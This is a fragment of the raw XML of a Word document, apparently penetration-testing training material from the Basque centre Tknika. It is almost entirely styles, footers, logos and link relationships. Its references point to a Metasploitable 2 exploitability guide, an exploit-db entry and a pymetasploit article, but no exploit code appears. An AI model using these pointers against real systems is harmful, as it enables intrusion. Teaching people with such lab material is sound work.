          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Rapid7. </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Metasploitable-2-exploitability-guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000170">
      <w:pPr>
        <w:spacing w:after="0" w:before="170" w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000171">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2555266" cy="1187264"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="168" name="image4.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="0" name="image4.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2555266" cy="118726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firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="2535936" cy="768096"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="169"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35936" cy="768096"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId27" w:type="default"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="426" w:top="567" w:left="1701" w:right="1701" w:header="708" w:footer="54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color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="2535936" cy="768096"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="171"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rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="5400040" cy="265242"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="172" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12.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right"/>
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="4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right"/>
      <w:rPr>
        <w:color w:val="00000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spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Source Sans Pro" w:cs="Source Sans Pro" w:eastAsia="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Zamalbide Auzoa z/g - 20100 Errenteria (Gipuzkoa) - T. (+34) 943 082 900 - info@tknika.eus – </w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017C">
    <w:pPr>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:b w:val="1"/>
        <w:color w:val="0000ff"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="20"/>
        <w:u w:val="single"/>
      </w:rPr>
    </w:pPr>
    <w:hyperlink r:id="rId1">
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="0000ff"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www.tknika.eus</w:t>
      </w:r>
    </w:hyperlink>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000017D">
    <w:pPr>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>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17E">
    <w:pPr>
      <w:spacing w:after="0" w:line="288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="5400040" cy="265242"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr id="173" name="image12.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image12.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288" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="40"/>
        <w:szCs w:val="4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color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:drawing>
        <wp:inline distB="0" distT="0" distL="0" distR="0">
          <wp:extent cx="2555266" cy="1187264"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:docPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="170" name="image4.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="C:\Users\Ana\AppData\Local\Microsoft\Windows\INetCache\Content.Word\LOGO_vertical_HQ.PNG" id="0" name="image4.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b w:val="1"/>
        <w:i w:val="0"/>
        <w:color w:val="cfda2d"/>
        <w:sz w:val="52"/>
        <w:szCs w:val="52"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="792" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="cfda2d"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1224" w:hanging="504"/>
      </w:pPr>
      <w:rPr>
        <w:color w:val="cfda2d"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1728" w:hanging="647.9999999999998"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2232" w:hanging="792"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2736" w:hanging="935.9999999999995"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="1080"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3744" w:hanging="1224.0000000000005"/>
      </w:pPr>
      <w:rPr/>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2.%3.%4.%5.%6.%7.%8.%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="144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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="4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720" w:hanging="36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1440" w:hanging="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
      <w:ind w:left="2160" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="2880" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="220" w:lineRule="auto"/>
      <w:ind w:left="3600" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="200" w:lineRule="auto"/>
      <w:ind w:left="432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jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:smallCaps w:val="1"/>
      <w:sz w:val="52"/>
      <w:szCs w:val="52"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="4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1440" w:hanging="36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2160" w:hanging="360"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
      <w:ind w:left="2880" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="3600" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="220" w:lineRule="auto"/>
      <w:ind w:left="4320" w:hanging="360"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="200" w:lineRule="auto"/>
      <w:ind w:left="504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432" w:hanging="432"/>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576" w:hanging="576"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="80" w:before="280" w:lineRule="auto"/>
      <w:ind w:left="1224" w:hanging="504.00000000000006"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
      <w:ind w:left="864" w:hanging="864"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:spacing w:after="40" w:before="220" w:lineRule="auto"/>
      <w:ind w:left="1008" w:hanging="1008"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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6E62"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00C20C8D"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:before="360" w:line="240" w:lineRule="auto"/>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numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia"/>
      <w:b w:val="1"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Ttulo3Car"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="80" w:before="280"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="40" w:before="240"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="40" w:before="220"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="8"/>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1C3CE4"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="8"/>
      </w:numPr>
      <w:spacing w:after="0"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1C3CE4"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="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1C3CE4"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:keepLines w:val="1"/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="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rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention" w:customStyle="1">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character" w:styleId="Ttulo7Car" w:customStyle="1">
    <w:name w:val="Título 7 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo7"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden w:val="1"/>
    <w:rsid w:val="001C3CE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1C3CE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1C3CE4"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:i w:val="1"/>
      <w:iCs w:val="1"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="0000D8"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Ttulo30" w:customStyle="1">
    <w:name w:val="Título3"/>
    <w:basedOn w:val="Ttulo3"/>
    <w:link w:val="Ttulo3Car0"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="007D6CBE"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Estilo1" w:customStyle="1">
    <w:name w:val="Estilo1"/>
    <w:basedOn w:val="Ttulo3"/>
    <w:link w:val="Estilo1Car"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="007D6CBE"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo3Car" w:customStyle="1">
    <w:name w:val="Título 3 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo3"/>
    <w:rsid w:val="00C15C1F"/>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Ttulo3Car0" w:customStyle="1">
    <w:name w:val="Título3 Car"/>
    <w:basedOn w:val="Ttulo3Car"/>
    <w:link w:val="Ttulo30"/>
    <w:rsid w:val="007D6CBE"/>
    <w:rPr>
      <w:b w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Estilo1Car" w:customStyle="1">
    <w:name w:val="Estilo1 Car"/>
    <w:basedOn w:val="Ttulo3Car"/>
    <w:link w:val="Estilo1"/>
    <w:rsid w:val="007D6CBE"/>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exploit-db.com/exploits/40714" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elladodelmal.com/2019/06/python-metasploit-libreria-pymetasploi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jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><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12.jpg"/></Relationships>
</file>

<file path=word/_rels/footer3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tknika.eus" TargetMode="External"/><Relationship Id="rId2"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vydNMNbkWCI36W4FxbaQr2Mkzw==">CgMxLjAyDmguaXljYmxmYXFwY3c0Mg5oLm9wN2k4Y2JmcDFrMTIOaC5kdGczMGszMW91OTYyDmguZDF3NzZ3NDRsMnprMg5oLmt2Z3JudXpnenNhMTIOaC5yYjd3NWpoMHBpZzMyDmguMjN3NGx2Z2R3cHkyMg5oLmU5bzk3ODRsYTUzODIOaC5jd2swbG1vYXlzMDIyDmguNGFuM291a2Nwa285Mg5oLjd1Y3QyNmZuemZmdTgAciExOXo5emlDcWtYeTJwQ0ZINlhtY3RIMWxaV2o5M0FWT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